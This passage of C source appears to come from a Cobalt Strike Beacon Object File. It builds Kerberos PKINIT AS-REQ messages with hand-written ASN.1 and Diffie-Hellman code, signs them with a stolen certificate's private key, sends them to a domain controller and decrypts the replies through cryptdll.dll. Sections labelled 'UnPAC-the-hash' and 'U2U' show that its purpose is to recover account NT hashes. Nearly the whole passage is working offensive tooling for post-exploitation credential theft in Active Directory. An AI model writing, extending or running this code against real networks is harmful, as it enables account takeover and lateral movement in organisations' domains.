    BYTE* nonceTag = BuildContextTag(7, nonceInt, nonceLen, &nonceTagLen);
    memcpy(content + offset, nonceTag, nonceTagLen);
    offset += nonceTagLen;
    free(nonceInt);
    free(nonceTag);

    /* etype [8] SEQUENCE OF INTEGER */
    BYTE etypesContent[32];
    int etypesContentLen = 0;
    int etypeLen;

    BYTE* etype1 = BuildInteger(ETYPE_AES256_CTS_HMAC_SHA1, &etypeLen);
    memcpy(etypesContent + etypesContentLen, etype1, etypeLen);
    etypesContentLen += etypeLen;
    free(etype1);

    BYTE* etype2 = BuildInteger(ETYPE_AES128_CTS_HMAC_SHA1, &etypeLen);
    memcpy(etypesContent + etypesContentLen, etype2, etypeLen);
    etypesContentLen += etypeLen;
    free(etype2);

    BYTE* etype3 = BuildInteger(ETYPE_RC4_HMAC, &etypeLen);
    memcpy(etypesContent + etypesContentLen, etype3, etypeLen);
    etypesContentLen += etypeLen;
    free(etype3);

    int etypesSeqLen;
    BYTE* etypesSeq = BuildSequence(etypesContent, etypesContentLen, &etypesSeqLen);
    int etypesTagLen;
    BYTE* etypesTag = BuildContextTag(8, etypesSeq, etypesSeqLen, &etypesTagLen);
    memcpy(content + offset, etypesTag, etypesTagLen);
    offset += etypesTagLen;
    free(etypesSeq);
    free(etypesTag);

    BYTE* result = BuildSequence(content, offset, outLen);
    free(content);
    return result;
}

/*
 * =============================================================================
 * BigInteger Implementation for DH (1024-bit MODP Group 2)
 * =============================================================================
 */

#define BIGINT_WORDS 64  /* 64 x 32-bit = 2048 bits max (for intermediate results) */
#define DH_BYTES 128     /* 1024 bits */
#define DH_WORDS 32      /* 32 x 32-bit words */

typedef struct {
    DWORD words[BIGINT_WORDS];  /* Little-endian word array */
    int len;                     /* Number of significant words */
} BigInt;

/* Initialize BigInt to zero */
static void bigint_zero(BigInt* n) {
    memset(n->words, 0, sizeof(n->words));
    n->len = 1;
}

/* Initialize BigInt from big-endian byte array */
static void bigint_from_bytes(BigInt* n, const BYTE* data, int dataLen) {
    int i, j;
    bigint_zero(n);

    /* Convert big-endian bytes to little-endian words */
    for (i = 0; i < dataLen && i < DH_BYTES; i++) {
        int bytePos = dataLen - 1 - i;
        int wordIdx = i / 4;
        int byteIdx = i % 4;
        n->words[wordIdx] |= ((DWORD)data[bytePos]) << (byteIdx * 8);
    }

    /* Calculate actual length */
    n->len = (dataLen + 3) / 4;
    while (n->len > 1 && n->words[n->len - 1] == 0) n->len--;
}

/* Convert BigInt to big-endian byte array */
static void bigint_to_bytes(BigInt* n, BYTE* out, int outLen) {
    int i;
    memset(out, 0, outLen);

    for (i = 0; i < outLen && i < n->len * 4; i++) {
        int wordIdx = i / 4;
        int byteIdx = i % 4;
        out[outLen - 1 - i] = (BYTE)(n->words[wordIdx] >> (byteIdx * 8));
    }
}

/* Compare: returns -1 if a < b, 0 if a == b, 1 if a > b */
static int bigint_cmp(BigInt* a, BigInt* b) {
    int i;
    int maxLen = (a->len > b->len) ? a->len : b->len;

    for (i = maxLen - 1; i >= 0; i--) {
        DWORD aw = (i < a->len) ? a->words[i] : 0;
        DWORD bw = (i < b->len) ? b->words[i] : 0;
        if (aw > bw) return 1;
        if (aw < bw) return -1;
    }
    return 0;
}

/* Subtraction: result = a - b (assumes a >= b) */
static void bigint_sub(BigInt* result, BigInt* a, BigInt* b) {
    int i;
    LONGLONG borrow = 0;

    for (i = 0; i < a->len; i++) {
        LONGLONG diff = (LONGLONG)a->words[i] - borrow;
        if (i < b->len) diff -= b->words[i];
        if (diff < 0) {
            diff += 0x100000000LL;
            borrow = 1;
        } else {
            borrow = 0;
        }
        result->words[i] = (DWORD)diff;
    }
    result->len = a->len;
    while (result->len > 1 && result->words[result->len - 1] == 0) result->len--;
}

/* Multiplication: result = a * b */
static void bigint_mul(BigInt* result, BigInt* a, BigInt* b) {
    int i, j;
    BigInt temp;
    bigint_zero(&temp);

    for (i = 0; i < a->len; i++) {
        ULONGLONG carry = 0;
        for (j = 0; j < b->len || carry; j++) {
            ULONGLONG prod = temp.words[i + j] + carry;
            if (j < b->len) prod += (ULONGLONG)a->words[i] * b->words[j];
            temp.words[i + j] = (DWORD)prod;
            carry = prod >> 32;
        }
        if (i + j > temp.len) temp.len = i + j;
    }
    while (temp.len > 1 && temp.words[temp.len - 1] == 0) temp.len--;

    memcpy(result, &temp, sizeof(BigInt));
}

/* Get bit at position */
static int bigint_get_bit(BigInt* n, int pos) {
    int wordIdx = pos / 32;
    int bitIdx = pos % 32;
    if (wordIdx >= n->len) return 0;
    return (n->words[wordIdx] >> bitIdx) & 1;
}

/* Get number of significant bits */
static int bigint_bit_length(BigInt* n) {
    int i;
    if (n->len == 0) return 0;

    DWORD top = n->words[n->len - 1];
    int bits = (n->len - 1) * 32;

    while (top) {
        bits++;
        top >>= 1;
    }
    return bits;
}

/* Modulo: result = a mod p (using repeated subtraction for simplicity) */
static void bigint_mod(BigInt* result, BigInt* a, BigInt* p) {
    BigInt temp, shifted_p;
    int shift;

    memcpy(&temp, a, sizeof(BigInt));

    /* Simple division by repeated subtraction with shifting */
    while (bigint_cmp(&temp, p) >= 0) {
        /* Find how much to shift p */
        int tempBits = bigint_bit_length(&temp);
        int pBits = bigint_bit_length(p);
        shift = tempBits - pBits;

        /* Shift p left */
        memcpy(&shifted_p, p, sizeof(BigInt));
        if (shift > 0) {
            int wordShift = shift / 32;
            int bitShift = shift % 32;
            int i;

            /* Shift by words */
            if (wordShift > 0) {
                for (i = shifted_p.len - 1; i >= 0; i--) {
                    if (i + wordShift < BIGINT_WORDS) {
                        shifted_p.words[i + wordShift] = shifted_p.words[i];
                    }
                    shifted_p.words[i] = 0;
                }
                shifted_p.len += wordShift;
            }

            /* Shift by bits */
            if (bitShift > 0) {
                DWORD carry = 0;
                for (i = 0; i < shifted_p.len; i++) {
                    DWORD newCarry = shifted_p.words[i] >> (32 - bitShift);
                    shifted_p.words[i] = (shifted_p.words[i] << bitShift) | carry;
                    carry = newCarry;
                }
                if (carry) {
                    shifted_p.words[shifted_p.len++] = carry;
                }
            }
        }

        /* If shifted_p > temp, reduce shift by 1 */
        if (bigint_cmp(&shifted_p, &temp) > 0) {
            /* Shift right by 1 bit */
            int i;
            for (i = 0; i < shifted_p.len; i++) {
                shifted_p.words[i] >>= 1;
                if (i + 1 < shifted_p.len) {
                    shifted_p.words[i] |= (shifted_p.words[i + 1] & 1) << 31;
                }
            }
            while (shifted_p.len > 1 && shifted_p.words[shifted_p.len - 1] == 0) {
                shifted_p.len--;
            }
        }

        /* Subtract */
        if (bigint_cmp(&temp, &shifted_p) >= 0) {
            bigint_sub(&temp, &temp, &shifted_p);
        } else {
            break;
        }
    }

    memcpy(result, &temp, sizeof(BigInt));
}

/* Modular exponentiation: result = base^exp mod p (square-and-multiply) */
static void bigint_modpow(BigInt* result, BigInt* base, BigInt* exp, BigInt* p) {
    BigInt temp_result, temp_base, temp_mul;
    int i, expBits;

    /* result = 1 */
    bigint_zero(&temp_result);
    temp_result.words[0] = 1;
    temp_result.len = 1;

    /* temp_base = base mod p */
    bigint_mod(&temp_base, base, p);

    expBits = bigint_bit_length(exp);

    for (i = 0; i < expBits; i++) {
        if (bigint_get_bit(exp, i)) {
            /* result = (result * temp_base) mod p */
            bigint_mul(&temp_mul, &temp_result, &temp_base);
            bigint_mod(&temp_result, &temp_mul, p);
        }
        /* temp_base = (temp_base * temp_base) mod p */
        bigint_mul(&temp_mul, &temp_base, &temp_base);
        bigint_mod(&temp_base, &temp_mul, p);
    }

    memcpy(result, &temp_result, sizeof(BigInt));
}

/*
 * =============================================================================
 * PKINIT - DH Key Generation (using BigInteger)
 * =============================================================================
 */

static void GenerateDHKeys(HCRYPTPROV hProv) {
    BigInt p, g, x, y;

    /* Generate random private key x (128 bytes) */
    CryptGenRandom(hProv, sizeof(g_dhPrivateKey), g_dhPrivateKey);
    g_dhPrivateKey[0] &= 0x7F; /* Ensure positive */

    /* Initialize BigInts */
    bigint_from_bytes(&p, DH_P_MODP2, sizeof(DH_P_MODP2));
    bigint_from_bytes(&g, DH_G_MODP2, sizeof(DH_G_MODP2));
    bigint_from_bytes(&x, g_dhPrivateKey, sizeof(g_dhPrivateKey));

    /* Calculate public key: y = g^x mod p */
    bigint_modpow(&y, &g, &x, &p);

    /* Convert back to bytes */
    bigint_to_bytes(&y, g_dhPublicKey, sizeof(g_dhPublicKey));
}

/* Build DH SubjectPublicKeyInfo */
static BYTE* BuildDhSubjectPublicKeyInfo(int* outLen) {
    BYTE* content = (BYTE*)malloc(1024);
    BYTE* domainParamsContent = (BYTE*)malloc(256);
    BYTE* algIdContent = (BYTE*)malloc(512);
    int offset = 0;

    /* AlgorithmIdentifier for DH */
    /* OID: 1.2.840.10046.2.1 (dhpublicnumber) */
    BYTE dhOid[] = { 0x06, 0x07, 0x2A, 0x86, 0x48, 0xCE, 0x3E, 0x02, 0x01 };

    /* DomainParameters: SEQUENCE { p INTEGER, g INTEGER } */
    int pIntLen;
    BYTE* pInt = BuildIntegerFromBytes((BYTE*)DH_P_MODP2, sizeof(DH_P_MODP2), &pIntLen);
    int gIntLen;
    BYTE* gInt = BuildIntegerFromBytes((BYTE*)DH_G_MODP2, sizeof(DH_G_MODP2), &gIntLen);

    memcpy(domainParamsContent, pInt, pIntLen);
    memcpy(domainParamsContent + pIntLen, gInt, gIntLen);
    int domainParamsLen;
    BYTE* domainParams = BuildSequence(domainParamsContent, pIntLen + gIntLen, &domainParamsLen);
    free(pInt);
    free(gInt);

    /* Build AlgorithmIdentifier SEQUENCE */
    memcpy(algIdContent, dhOid, sizeof(dhOid));
    memcpy(algIdContent + sizeof(dhOid), domainParams, domainParamsLen);
    int algIdLen;
    BYTE* algId = BuildSequence(algIdContent, sizeof(dhOid) + domainParamsLen, &algIdLen);
    free(domainParams);

    memcpy(content + offset, algId, algIdLen);
    offset += algIdLen;
    free(algId);

    /* BIT STRING containing public key INTEGER */
    int pubKeyIntLen;
    BYTE* pubKeyInt = BuildIntegerFromBytes(g_dhPublicKey, sizeof(g_dhPublicKey), &pubKeyIntLen);
    int pubKeyBitLen;
    BYTE* pubKeyBit = BuildBitString(pubKeyInt, pubKeyIntLen, &pubKeyBitLen);
    free(pubKeyInt);

    memcpy(content + offset, pubKeyBit, pubKeyBitLen);
    offset += pubKeyBitLen;
    free(pubKeyBit);

    free(domainParamsContent);
    free(algIdContent);
    BYTE* result = BuildSequence(content, offset, outLen);
    free(content);
    return result;
}

/*
 * =============================================================================
 * PKINIT - AuthPack Construction
 * =============================================================================
 */

static BYTE* BuildPKAuthenticator(const char* user, const char* realm,
                                   BYTE* paChecksum, int paChecksumLen, int* outLen) {
    BYTE* content = (BYTE*)malloc(512);
    int offset = 0;

    /* cusec [0] INTEGER (microseconds) */
    SYSTEMTIME st;
    GetSystemTime(&st);
    int cusec = st.wMilliseconds * 1000;
    int cusecLen;
    BYTE* cusecInt = BuildInteger(cusec, &cusecLen);
    int cusecTagLen;
    BYTE* cusecTag = BuildContextTag(0, cusecInt, cusecLen, &cusecTagLen);
    memcpy(content + offset, cusecTag, cusecTagLen);
    offset += cusecTagLen;
    free(cusecInt);
    free(cusecTag);

    /* ctime [1] KerberosTime */
    char ctime[20];
    sprintf(ctime, "%04d%02d%02d%02d%02d%02dZ",
            st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond);
    int ctimeStrLen;
    BYTE* ctimeStr = BuildGeneralizedTime(ctime, &ctimeStrLen);
    int ctimeTagLen;
    BYTE* ctimeTag = BuildContextTag(1, ctimeStr, ctimeStrLen, &ctimeTagLen);
    memcpy(content + offset, ctimeTag, ctimeTagLen);
    offset += ctimeTagLen;
    free(ctimeStr);
    free(ctimeTag);

    /* nonce [2] INTEGER */
    int nonceLen;
    BYTE* nonceInt = BuildInteger(g_nonce, &nonceLen);
    int nonceTagLen;
    BYTE* nonceTag = BuildContextTag(2, nonceInt, nonceLen, &nonceTagLen);
    memcpy(content + offset, nonceTag, nonceTagLen);
    offset += nonceTagLen;
    free(nonceInt);
    free(nonceTag);

    /* paChecksum [3] OCTET STRING (SHA-1 of req-body) */
    if (paChecksum != NULL && paChecksumLen > 0) {
        int checksumOctetLen;
        BYTE* checksumOctet = BuildOctetString(paChecksum, paChecksumLen, &checksumOctetLen);
        int checksumTagLen;
        BYTE* checksumTag = BuildContextTag(3, checksumOctet, checksumOctetLen, &checksumTagLen);
        memcpy(content + offset, checksumTag, checksumTagLen);
        offset += checksumTagLen;
        free(checksumOctet);
        free(checksumTag);
    }

    BYTE* result = BuildSequence(content, offset, outLen);
    free(content);
    return result;
}

static BYTE* BuildAuthPack(const char* user, const char* realm,
                           BYTE* paChecksum, int paChecksumLen, int* outLen) {
    BYTE* content = (BYTE*)malloc(2048);
    int offset = 0;

    /* pkAuthenticator [0] PKAuthenticator */
    int pkAuthLen;
    BYTE* pkAuth = BuildPKAuthenticator(user, realm, paChecksum, paChecksumLen, &pkAuthLen);
    int pkAuthTagLen;
    BYTE* pkAuthTag = BuildContextTag(0, pkAuth, pkAuthLen, &pkAuthTagLen);
    memcpy(content + offset, pkAuthTag, pkAuthTagLen);
    offset += pkAuthTagLen;
    free(pkAuth);
    free(pkAuthTag);

    /* clientPublicValue [1] SubjectPublicKeyInfo (for DH) */
    int dhPubKeyInfoLen;
    BYTE* dhPubKeyInfo = BuildDhSubjectPublicKeyInfo(&dhPubKeyInfoLen);
    int dhPubKeyTagLen;
    BYTE* dhPubKeyTag = BuildContextTag(1, dhPubKeyInfo, dhPubKeyInfoLen, &dhPubKeyTagLen);
    memcpy(content + offset, dhPubKeyTag, dhPubKeyTagLen);
    offset += dhPubKeyTagLen;
    free(dhPubKeyInfo);
    free(dhPubKeyTag);

    BYTE* result = BuildSequence(content, offset, outLen);
    free(content);
    return result;
}

/*
 * =============================================================================
 * PKINIT - CMS SignedData Construction
 * =============================================================================
 */

static BYTE* BuildCmsSignedData(PCCERT_CONTEXT pCert, BYTE* content, int contentLen, int* outLen) {
    /*
     * Build CMS SignedData using Windows CryptoMsg API
     * Uses CryptMsgOpenToEncode with id-pkinit-authData OID
     */
    #define szOID_PKINIT_AUTHDATA_STR "1.3.6.1.5.2.3.1"

    HCRYPTPROV hProv = 0;
    DWORD keySpec = 0;
    BOOL fCallerFree = FALSE;
    HCRYPTMSG hMsg = NULL;
    BYTE* signedMsg = NULL;
    DWORD signedMsgLen = 0;
    CMSG_SIGNER_ENCODE_INFO signerInfo;
    CMSG_SIGNED_ENCODE_INFO signedInfo;
    CERT_BLOB certBlob;

    *outLen = 0;

    if (!CryptAcquireCertificatePrivateKey(pCert, 0, NULL, &hProv, &keySpec, &fCallerFree)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to acquire private key: 0x%08X", GetLastError());
        return NULL;
    }

    memset(&signerInfo, 0, sizeof(signerInfo));
    signerInfo.cbSize = sizeof(signerInfo);
    signerInfo.pCertInfo = pCert->pCertInfo;
    signerInfo.hCryptProv = hProv;
    signerInfo.dwKeySpec = keySpec;
    signerInfo.HashAlgorithm.pszObjId = (LPSTR)szOID_RSA_SHA1RSA;

    certBlob.cbData = pCert->cbCertEncoded;
    certBlob.pbData = pCert->pbCertEncoded;

    memset(&signedInfo, 0, sizeof(signedInfo));
    signedInfo.cbSize = sizeof(signedInfo);
    signedInfo.cSigners = 1;
    signedInfo.rgSigners = &signerInfo;
    signedInfo.cCertEncoded = 1;
    signedInfo.rgCertEncoded = &certBlob;

    hMsg = CryptMsgOpenToEncode(
        PKCS_7_ASN_ENCODING | X509_ASN_ENCODING,
        0,
        CMSG_SIGNED,
        &signedInfo,
        szOID_PKINIT_AUTHDATA_STR,
        NULL
    );

    if (!hMsg) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptMsgOpenToEncode failed: 0x%08X", GetLastError());
        goto cleanup;
    }

    if (!CryptMsgUpdate(hMsg, content, contentLen, TRUE)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptMsgUpdate failed: 0x%08X", GetLastError());
        goto cleanup;
    }

    if (!CryptMsgGetParam(hMsg, CMSG_CONTENT_PARAM, 0, NULL, &signedMsgLen)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptMsgGetParam size failed: 0x%08X", GetLastError());
        goto cleanup;
    }

    signedMsg = (BYTE*)malloc(signedMsgLen);
    if (!CryptMsgGetParam(hMsg, CMSG_CONTENT_PARAM, 0, signedMsg, &signedMsgLen)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptMsgGetParam failed: 0x%08X", GetLastError());
        free(signedMsg);
        signedMsg = NULL;
        goto cleanup;
    }

    *outLen = signedMsgLen;

cleanup:
    if (hMsg) CryptMsgClose(hMsg);
    if (fCallerFree && hProv) CryptReleaseContext(hProv, 0);
    return signedMsg;
}

/*
 * =============================================================================
 * PKINIT - PA-PK-AS-REQ Construction
 * =============================================================================
 */

static BYTE* BuildPaPkAsReq(PCCERT_CONTEXT pCert, BYTE* authPack, int authPackLen, int* outLen) {
    /* Build CMS SignedData containing AuthPack */
    int signedDataLen;
    BYTE* signedData = BuildCmsSignedData(pCert, authPack, authPackLen, &signedDataLen);

    if (signedData == NULL) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to build CMS SignedData");
        return NULL;
    }

    /* PA-PK-AS-REQ ::= SEQUENCE {
     *   signedAuthPack [0] IMPLICIT OCTET STRING
     * }
     */
    BYTE* content = (BYTE*)malloc(8192);
    int offset = 0;

    /* [0] IMPLICIT - use context tag 0x80 for primitive or 0xA0 for constructed */
    content[offset++] = 0x80; /* [0] IMPLICIT primitive */
    int lenSize = EncodeLength(content + offset, signedDataLen);
    offset += lenSize;
    memcpy(content + offset, signedData, signedDataLen);
    offset += signedDataLen;
    free(signedData);

    BYTE* result = BuildSequence(content, offset, outLen);
    free(content);
    return result;
}

/*
 * =============================================================================
 * PKINIT - Full AS-REQ Construction
 * =============================================================================
 */

static BYTE* BuildPkinitAsReq(PCCERT_CONTEXT pCert, const char* user, const char* domain, int* outLen) {
    char* realm = (char*)malloc(256);
    BYTE* padataContent = (BYTE*)malloc(8192);
    BYTE* asReqContent = (BYTE*)malloc(16384);
    BYTE* result = NULL;
    int i;

    /* Convert domain to uppercase for realm */
    for (i = 0; domain[i] && i < 255; i++) {
        realm[i] = (domain[i] >= 'a' && domain[i] <= 'z') ? domain[i] - 32 : domain[i];
    }
    realm[i] = '\0';

    /* Build req-body first (needed for paChecksum) */
    int reqBodyLen;
    BYTE* reqBody = BuildKdcReqBody(user, realm, &reqBodyLen);

    /* Calculate SHA-1 of req-body for paChecksum */
    HCRYPTPROV hProv;
    HCRYPTHASH hHash;
    BYTE paChecksum[20];
    DWORD hashLen = 20;

    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptAcquireContext failed");
        free(reqBody);
        goto cleanup;
    }

    /* Generate DH keys */
    GenerateDHKeys(hProv);

    CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash);
    CryptHashData(hHash, reqBody, reqBodyLen, 0);
    CryptGetHashParam(hHash, HP_HASHVAL, paChecksum, &hashLen, 0);
    CryptDestroyHash(hHash);
    CryptReleaseContext(hProv, 0);

    /* Build AuthPack */
    int authPackLen;
    BYTE* authPack = BuildAuthPack(user, realm, paChecksum, 20, &authPackLen);

    /* Build PA-PK-AS-REQ */
    int paPkAsReqLen;
    BYTE* paPkAsReq = BuildPaPkAsReq(pCert, authPack, authPackLen, &paPkAsReqLen);
    free(authPack);

    if (paPkAsReq == NULL) {
        free(reqBody);
        goto cleanup;
    }

    /* Build PA-DATA for PKINIT */
    int padataOffset = 0;

    /* padata-type [1] INTEGER (16 = PA-PK-AS-REQ) */
    int paTypeLen;
    BYTE* paTypeInt = BuildInteger(PA_PK_AS_REQ, &paTypeLen);
    int paTypeTagLen;
    BYTE* paTypeTag = BuildContextTag(1, paTypeInt, paTypeLen, &paTypeTagLen);
    memcpy(padataContent + padataOffset, paTypeTag, paTypeTagLen);
    padataOffset += paTypeTagLen;
    free(paTypeInt);
    free(paTypeTag);

    /* padata-value [2] OCTET STRING */
    int paValueOctetLen;
    BYTE* paValueOctet = BuildOctetString(paPkAsReq, paPkAsReqLen, &paValueOctetLen);
    int paValueTagLen;
    BYTE* paValueTag = BuildContextTag(2, paValueOctet, paValueOctetLen, &paValueTagLen);
    memcpy(padataContent + padataOffset, paValueTag, paValueTagLen);
    padataOffset += paValueTagLen;
    free(paValueOctet);
    free(paValueTag);
    free(paPkAsReq);

    int padataSeqLen;
    BYTE* padataSeq = BuildSequence(padataContent, padataOffset, &padataSeqLen);

    /* Build AS-REQ */
    int asReqOffset = 0;

    /* pvno [1] INTEGER (5) */
    int pvnoLen;
    BYTE* pvnoInt = BuildInteger(5, &pvnoLen);
    int pvnoTagLen;
    BYTE* pvnoTag = BuildContextTag(1, pvnoInt, pvnoLen, &pvnoTagLen);
    memcpy(asReqContent + asReqOffset, pvnoTag, pvnoTagLen);
    asReqOffset += pvnoTagLen;
    free(pvnoInt);
    free(pvnoTag);

    /* msg-type [2] INTEGER (10 = AS-REQ) */
    int msgTypeLen;
    BYTE* msgTypeInt = BuildInteger(KRB_AS_REQ, &msgTypeLen);
    int msgTypeTagLen;
    BYTE* msgTypeTag = BuildContextTag(2, msgTypeInt, msgTypeLen, &msgTypeTagLen);
    memcpy(asReqContent + asReqOffset, msgTypeTag, msgTypeTagLen);
    asReqOffset += msgTypeTagLen;
    free(msgTypeInt);
    free(msgTypeTag);

    /* padata [3] SEQUENCE OF PA-DATA */
    int padataOuterSeqLen;
    BYTE* padataOuterSeq = BuildSequence(padataSeq, padataSeqLen, &padataOuterSeqLen);
    int padataOuterTagLen;
    BYTE* padataOuterTag = BuildContextTag(3, padataOuterSeq, padataOuterSeqLen, &padataOuterTagLen);
    memcpy(asReqContent + asReqOffset, padataOuterTag, padataOuterTagLen);
    asReqOffset += padataOuterTagLen;
    free(padataSeq);
    free(padataOuterSeq);
    free(padataOuterTag);

    /* req-body [4] KDC-REQ-BODY */
    int reqBodyTagLen;
    BYTE* reqBodyTag = BuildContextTag(4, reqBody, reqBodyLen, &reqBodyTagLen);
    memcpy(asReqContent + asReqOffset, reqBodyTag, reqBodyTagLen);
    asReqOffset += reqBodyTagLen;
    free(reqBody);
    free(reqBodyTag);

    /* Wrap in SEQUENCE */
    int asReqSeqLen;
    BYTE* asReqSeq = BuildSequence(asReqContent, asReqOffset, &asReqSeqLen);

    /* Wrap in APPLICATION 10 (AS-REQ) */
    result = BuildApplication(KRB_AS_REQ, asReqSeq, asReqSeqLen, outLen);
    free(asReqSeq);

cleanup:
    free(realm);
    free(padataContent);
    free(asReqContent);
    return result;
}

/*
 * =============================================================================
 * Network - Send to KDC
 * =============================================================================
 */

static BYTE* SendToKdc(const char* kdcHost, int port, BYTE* data, int dataLen, int* respLen) {
    WSADATA wsaData;
    SOCKET sock = INVALID_SOCKET;
    struct sockaddr_in server;
    struct hostent* host;
    BYTE* response = NULL;
    BYTE lengthPrefix[4];
    DWORD totalLen;

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] WSAStartup failed");
        return NULL;
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Socket creation failed");
        WSACleanup();
        return NULL;
    }

    /* Resolve hostname */
    host = gethostbyname(kdcHost);
    if (!host) {
        server.sin_addr.s_addr = inet_addr(kdcHost);
        if (server.sin_addr.s_addr == INADDR_NONE) {
            BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to resolve %s", kdcHost);
            closesocket(sock);
            WSACleanup();
            return NULL;
        }
    } else {
        memcpy(&server.sin_addr, host->h_addr_list[0], host->h_length);
    }
    server.sin_family = AF_INET;
    server.sin_port = htons((unsigned short)port);

    if (connect(sock, (struct sockaddr*)&server, sizeof(server)) < 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Connection failed");
        closesocket(sock);
        WSACleanup();
        return NULL;
    }

    /* Send with 4-byte length prefix (big-endian) */
    totalLen = htonl(dataLen);
    memcpy(lengthPrefix, &totalLen, 4);
    send(sock, (char*)lengthPrefix, 4, 0);
    send(sock, (char*)data, dataLen, 0);

    /* Receive response length */
    if (recv(sock, (char*)lengthPrefix, 4, 0) != 4) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to receive response length");
        closesocket(sock);
        WSACleanup();
        return NULL;
    }

    memcpy(&totalLen, lengthPrefix, 4);
    *respLen = ntohl(totalLen);

    if (*respLen <= 0 || *respLen > 100000) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Invalid response length: %d", *respLen);
        closesocket(sock);
        WSACleanup();
        return NULL;
    }

    /* Receive response */
    response = (BYTE*)malloc(*respLen);
    int received = 0;
    while (received < *respLen) {
        int r = recv(sock, (char*)response + received, *respLen - received, 0);
        if (r <= 0) break;
        received += r;
    }

    closesocket(sock);
    WSACleanup();

    return response;
}

/*
 * =============================================================================
 * UnPAC-the-hash - Kerberos Decryption
 * =============================================================================
 */

static BYTE* KerberosDecrypt(int eType, int keyUsage, BYTE* key, int keyLen,
                              BYTE* data, int dataLen, int* outLen) {
    HMODULE hCryptDll = NULL;
    CDLocateCSystem_t pCDLocateCSystem = NULL;
    KERB_ECRYPT* pCSystem = NULL;
    void* pContext = NULL;
    BYTE* output = NULL;
    int status;

    hCryptDll = LoadLibraryA("cryptdll.dll");
    if (!hCryptDll) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to load cryptdll.dll");
        return NULL;
    }

    pCDLocateCSystem = (CDLocateCSystem_t)GetProcAddress(hCryptDll, "CDLocateCSystem");
    if (!pCDLocateCSystem) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to find CDLocateCSystem");
        FreeLibrary(hCryptDll);
        return NULL;
    }

    status = pCDLocateCSystem(eType, (void**)&pCSystem);
    if (status != 0 || !pCSystem) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CDLocateCSystem failed: 0x%X", status);
        FreeLibrary(hCryptDll);
        return NULL;
    }

    /* Get function pointers from KERB_ECRYPT structure */
    KERB_ECRYPT_Initialize initFunc = (KERB_ECRYPT_Initialize)pCSystem->Initialize;
    KERB_ECRYPT_Decrypt decryptFunc = (KERB_ECRYPT_Decrypt)pCSystem->Decrypt;
    KERB_ECRYPT_Finish finishFunc = (KERB_ECRYPT_Finish)pCSystem->Finish;

    /* Initialize decryption context */
    status = initFunc(key, keyLen, keyUsage, &pContext);
    if (status != 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Decrypt Initialize failed: 0x%X", status);
        FreeLibrary(hCryptDll);
        return NULL;
    }

    /* Calculate output size */
    int outputSize = dataLen;
    if (dataLen % pCSystem->BlockSize != 0) {
        outputSize += pCSystem->BlockSize - (dataLen % pCSystem->BlockSize);
    }
    outputSize += pCSystem->Size;

    output = (BYTE*)malloc(outputSize);

    /* Decrypt */
    status = decryptFunc(pContext, data, dataLen, output, &outputSize);
    finishFunc(&pContext);

    if (status != 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Decrypt failed: 0x%X", status);
        free(output);
        FreeLibrary(hCryptDll);
        return NULL;
    }

    *outLen = outputSize;
    FreeLibrary(hCryptDll);
    return output;
}

/*
 * =============================================================================
 * U2U - Kerberos Encryption
 * =============================================================================
 */

typedef int (WINAPI *KERB_ECRYPT_Encrypt)(void* pContext, BYTE* data, int dataSize, BYTE* output, int* outputSize);

static BYTE* KerberosEncrypt(int eType, int keyUsage, BYTE* key, int keyLen,
                              BYTE* data, int dataLen, int* outLen) {
    HMODULE hCryptDll = NULL;
    CDLocateCSystem_t pCDLocateCSystem = NULL;
    KERB_ECRYPT* pCSystem = NULL;
    void* pContext = NULL;
    BYTE* output = NULL;
    int status;

    hCryptDll = LoadLibraryA("cryptdll.dll");
    if (!hCryptDll) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to load cryptdll.dll for encrypt");
        return NULL;
    }

    pCDLocateCSystem = (CDLocateCSystem_t)GetProcAddress(hCryptDll, "CDLocateCSystem");
    if (!pCDLocateCSystem) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to find CDLocateCSystem");
        FreeLibrary(hCryptDll);
        return NULL;
    }

    status = pCDLocateCSystem(eType, (void**)&pCSystem);
    if (status != 0 || !pCSystem) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] CDLocateCSystem failed for encrypt: 0x%X", status);
        FreeLibrary(hCryptDll);
        return NULL;
    }

    /* Get function pointers */
    KERB_ECRYPT_Initialize initFunc = (KERB_ECRYPT_Initialize)pCSystem->Initialize;
    KERB_ECRYPT_Encrypt encryptFunc = (KERB_ECRYPT_Encrypt)pCSystem->Encrypt;
    KERB_ECRYPT_Finish finishFunc = (KERB_ECRYPT_Finish)pCSystem->Finish;

    /* Initialize encryption context */
    status = initFunc(key, keyLen, keyUsage, &pContext);
    if (status != 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Encrypt Initialize failed: 0x%X", status);
        FreeLibrary(hCryptDll);
        return NULL;
    }

    /* Output size = data + checksum + confounder overhead */
    int outputSize = dataLen + pCSystem->Size;
    output = (BYTE*)malloc(outputSize);

    /* Encrypt */
    status = encryptFunc(pContext, data, dataLen, output, &outputSize);
    finishFunc(&pContext);

    if (status != 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Encrypt failed: 0x%X", status);
        free(output);
        FreeLibrary(hCryptDll);
        return NULL;
    }

